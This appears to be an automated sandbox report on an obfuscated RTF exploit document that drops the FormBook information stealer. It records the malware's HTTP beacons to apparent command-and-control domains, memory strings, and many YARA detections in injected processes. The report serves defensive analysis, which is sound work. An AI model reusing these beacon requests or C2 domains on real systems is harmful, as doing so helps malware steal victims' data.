          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerp
          Source: explorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E27A50A-FBC0-4F18-B35D-48F0F2347081}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: www.thegoldencamel.online
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1Host: www.thegoldencamel.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1Host: www.best-boy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 16:39:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.thegoldencamel.online/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: MISSServer: cloudflareCF-RAY: 7379b09ee927997b-FRAData Raw: 31 36 61 33 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Document contains OLE streams which likely are hidden ActiveX objects
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drStream path '_1721489047/\x1Ole10Native' : ....Client.exe.C:\Path\Client.exe.........C:\Path\
          Malicious sample detected (through community Yara rule)
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
